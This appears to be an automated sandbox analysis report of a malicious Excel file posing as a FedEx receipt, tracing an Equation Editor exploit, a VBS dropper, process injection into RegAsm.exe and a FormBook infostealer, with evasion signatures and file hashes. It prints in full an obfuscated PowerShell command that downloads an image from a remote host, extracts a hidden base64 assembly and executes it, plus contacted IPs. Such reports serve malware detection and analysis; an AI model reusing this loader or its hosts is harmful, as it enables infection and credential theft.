Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: FedEx Receipt_53065724643.xls	Stream path 'MBD00023D34/Package' entropy: 7.96088183378 (max. 8.0)
Source: FedEx Receipt_53065724643.xls	Stream path 'Workbook' entropy: 7.99936801752 (max. 8.0)
Source: ~DFE1D622D06AD63FEF.TMP.0.dr	Stream path 'Package' entropy: 7.95091166004 (max. 8.0)
Source: B9930000.0.dr	Stream path 'MBD00023D34/Package' entropy: 7.95091166004 (max. 8.0)
Source: B9930000.0.dr	Stream path 'Workbook' entropy: 7.99916779387 (max. 8.0)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_023E0101 rdtsc

12_2_023E0101

Contains long sleeps (>= 3 min)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1468			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3293			Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3524	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe TID: 3656	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3776	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3780	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3716	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3828	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process queried: DebugPort

Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_023E0101 rdtsc

12_2_023E0101

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_023907AC NtCreateMutant,LdrInitializeThunk,

12_2_023907AC

Contains functionality to read the PEB

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 7_2_03640805 mov edx, dword ptr fs:[00000030h]	7_2_03640805
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_02380080 mov ecx, dword ptr fs:[00000030h]	12_2_02380080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023800EA mov eax, dword ptr fs:[00000030h]	12_2_023800EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_023A26F8 mov eax, dword ptr fs:[00000030h]	12_2_023A26F8

Enables debug privileges

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\wscript.exe

Network Connect: 41.216.183.13 80

Jump to behavior

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: powershell.exe PID: 3688, type: MEMORYSTR

.NET source code references suspicious native API functions

Source: 10.2.powershell.exe.280000.0.raw.unpack, RunPEE.cs	Reference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref (string)(&name)), ref (string)(&method)), typeof(CreateApi)))
Source: 10.2.powershell.exe.280000.0.raw.unpack, RunPEE.cs	Reference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref (string)(&name)), ref (string)(&method)), typeof(CreateApi)))
Source: 10.2.powershell.exe.280000.0.raw.unpack, RunPEE.cs	Reference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num7 + num14, array2, array2.Length, ref bytesWritten)
Source: 10.2.powershell.exe.280000.0.raw.unpack, RunPEE.cs	Reference to suspicious API methods: lIuveTP8wwjVYKV1XP(VirtualAllocEx, processInformation.ProcessHandle, 0, length, 12288, 64)
Source: 10.2.powershell.exe.280000.0.raw.unpack, RunPEE.cs	Reference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num15 + 8, ref buffer, 4, ref bytesWritten)

Injects a PE file into a foreign processes

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\magesofrosepetelflowerstogetitgrea.vBS"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('PvLlink = tA4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4'+'; PvLwebClient ='+' New-Object System.Net.WebClient'+'; try { PvLdownloadedData = PvLwebCl'+'ient.DownloadData(PvLlink) } catch { '+'Write-H'+'ost tA4Failed To download data from PvLlinktA4 -ForegroundCol'+'or Red; exit };'+' if (PvLdownloadedData -ne PvLnull) { '+'PvLima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetString(PvLdownloadedData'+'); PvLstartFla'+'g = tA4<<BASE64_START>>tA4; PvLendFlag = tA4<<BASE64_END>'+'>tA4; PvLstartIndex = PvLimageText.IndexOf('+'PvLstartFl'+'ag); PvLendIndex '+'= PvLimag'+'eText.IndexO'+'f(PvLend'+'Flag); if (PvLstartIndex -ge 0 -and '+'PvLendIndex -gt PvLstartIndex) { PvLstartIndex'+' += PvLstartFlag.Length; PvLbase64Length = PvLendI'+'ndex - PvLstartIndex; '+'PvLbase64Command = PvLimageText.Substring(PvLstartIndex,'+' PvLbase64Length)'+'; Pv'+'Lcomma'+'ndBytes = '+'[System.Convert]::FromBase64String(PvLbase64Command);'+' PvLloadedAssembly = [System.Reflection.Ass'+'embly]::Load(PvLcommandB'+'ytes); PvLtype = PvLloadedAssembly'+'.GetType(tA4RunPE.HometA4); PvLmethod = PvLtype.GetMethod(tA4VAItA4).Invoke(PvLnull, [object[]] (tA4txt.JNNB/77088/61.532.59.32//:ptthtA4 , tA4desativadotA4 , tA4desativadotA4 , tA4desativadotA4,tA4RegAsm'+'tA4,tA4tA4))'+' } }').rePLACe(([cHar]80+[cHar]118+[cHar]76),'$').rePLACe(([cHar]116+[cHar]65+[cHar]52),[StRInG][cHar]39)\| IEx"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "('pvllink = ta4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235ta4'+'; pvlwebclient ='+' new-object system.net.webclient'+'; try { pvldownloadeddata = pvlwebcl'+'ient.downloaddata(pvllink) } catch { '+'write-h'+'ost ta4failed to download data from pvllinkta4 -foregroundcol'+'or red; exit };'+' if (pvldownloadeddata -ne pvlnull) { '+'pvlima'+'getex'+'t = [system.text.encoding]::utf8.getstring(pvldownloadeddata'+'); pvlstartfla'+'g = ta4<<base64_start>>ta4; pvlendflag = ta4<<base64_end>'+'>ta4; pvlstartindex = pvlimagetext.indexof('+'pvlstartfl'+'ag); pvlendindex '+'= pvlimag'+'etext.indexo'+'f(pvlend'+'flag); if (pvlstartindex -ge 0 -and '+'pvlendindex -gt pvlstartindex) { pvlstartindex'+' += pvlstartflag.length; pvlbase64length = pvlendi'+'ndex - pvlstartindex; '+'pvlbase64command = pvlimagetext.substring(pvlstartindex,'+' pvlbase64length)'+'; pv'+'lcomma'+'ndbytes = '+'[system.convert]::frombase64string(pvlbase64command);'+' pvlloadedassembly = [system.reflection.ass'+'embly]::load(pvlcommandb'+'ytes); pvltype = pvlloadedassembly'+'.gettype(ta4runpe.hometa4); pvlmethod = pvltype.getmethod(ta4vaita4).invoke(pvlnull, [object[]] (ta4txt.jnnb/77088/61.532.59.32//:ptthta4 , ta4desativadota4 , ta4desativadota4 , ta4desativadota4,ta4regasm'+'ta4,ta4ta4))'+' } }').replace(([char]80+[char]118+[char]76),'$').replace(([char]116+[char]65+[char]52),[string][char]39)\| iex"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "('pvllink = ta4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235ta4'+'; pvlwebclient ='+' new-object system.net.webclient'+'; try { pvldownloadeddata = pvlwebcl'+'ient.downloaddata(pvllink) } catch { '+'write-h'+'ost ta4failed to download data from pvllinkta4 -foregroundcol'+'or red; exit };'+' if (pvldownloadeddata -ne pvlnull) { '+'pvlima'+'getex'+'t = [system.text.encoding]::utf8.getstring(pvldownloadeddata'+'); pvlstartfla'+'g = ta4<<base64_start>>ta4; pvlendflag = ta4<<base64_end>'+'>ta4; pvlstartindex = pvlimagetext.indexof('+'pvlstartfl'+'ag); pvlendindex '+'= pvlimag'+'etext.indexo'+'f(pvlend'+'flag); if (pvlstartindex -ge 0 -and '+'pvlendindex -gt pvlstartindex) { pvlstartindex'+' += pvlstartflag.length; pvlbase64length = pvlendi'+'ndex - pvlstartindex; '+'pvlbase64command = pvlimagetext.substring(pvlstartindex,'+' pvlbase64length)'+'; pv'+'lcomma'+'ndbytes = '+'[system.convert]::frombase64string(pvlbase64command);'+' pvlloadedassembly = [system.reflection.ass'+'embly]::load(pvlcommandb'+'ytes); pvltype = pvlloadedassembly'+'.gettype(ta4runpe.hometa4); pvlmethod = pvltype.getmethod(ta4vaita4).invoke(pvlnull, [object[]] (ta4txt.jnnb/77088/61.532.59.32//:ptthta4 , ta4desativadota4 , ta4desativadota4 , ta4desativadota4,ta4regasm'+'ta4,ta4ta4))'+' } }').replace(([char]80+[char]118+[char]76),'$').replace(([char]116+[char]65+[char]52),[string][char]39)\| iex"			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.572393778.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.572358514.0000000000250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 12.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.572393778.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.572358514.0000000000250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Windows Analysis Report
FedEx Receipt_53065724643.xls

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Exploits

Compliance

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	1465865
Product:	CloudBasic
Start time:	07:51:08
Start date:	02.07.2024
Sample:	FedEx Receipt_53065724643.xls
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	4bb5a21106d460a7e9f63d44e47359cc
SHA1:	bb87ff08d79ebb57f97f97407db083bb13bb580d
SHA256:	adf19fed5bdfe80fc084a7ff1ad2ba59dc986dfe5b7dd7d2864c129bce51c0a0
Filetype:	Microsoft Excel sheet (30009/1) 47.99%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr65536.dat	data	0DA803B40584EF9709DD06B0FD3D2C61	E68DEB026E2F460EF2F6D985F604EE22B8319782	41054DD24D6674C11B46C7E21BBE5772DBAB6C64AC93D16F4D081C16C27E71FC
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD (copy)	data	275467E6780C37AE8123C88438C512BF	9FAB04FCAB90E13397F240E273CC0A526336F3AD	7BB1686E2E1985ACCA5AC310DB73689ADF04371BDD185E2404433D3331759CFA
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	446DD1CF97EABA21CF14D03AEBC79F27	36E4CC7367E0C7B40F4A8ACE272941EA46373799	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ima.imim.im.imim[1].doc	Rich Text Format data, version 1	FC6D03389137A4F7B1C724EC632A3E13	4BAAEB9B744174CDA60DD44D32C8B93088B34DA6	DFC80706C16EF11550F70829E4EDD5722FDA298BC55FCDFF152F1A5E85FDDB28
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\imagesofrosepetelflowerstogetitgreat[1].gif	Unicode text, UTF-16, little-endian text, with CRLF line terminators	EA1D347A4039B2E1E28ABC47632FEC36	665B0B2848158A97B869BC857B960E5B368C8FC3	6EE8EEFF1A72D43329384218C45CBAF41DF6B7F3AFC7B95138B24087B796B07F
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3746FCBA.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	8351C59D10C7D232E71699A20FAA0582	9FBB25F3793BD0C8C41913FCAE9393ADBF35BEA8	1ACDF49D80CC1C7B8EDFBC63B9D35428390A8A00A39B9328DDFC74BAA3C44EB7
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\42DD58C7.emf	Windows Enhanced Metafile (EMF) image data version 0x10000	8F49B5A3A5C66A3D4AFEBFF5560D700E	330ADB868799FFE2FA9A0CEC46408DCF42809F84	084865F0440D90AB2746F9F8F4B8A208192768EA1CCA08C2E7B1BCF7DF3E56D3
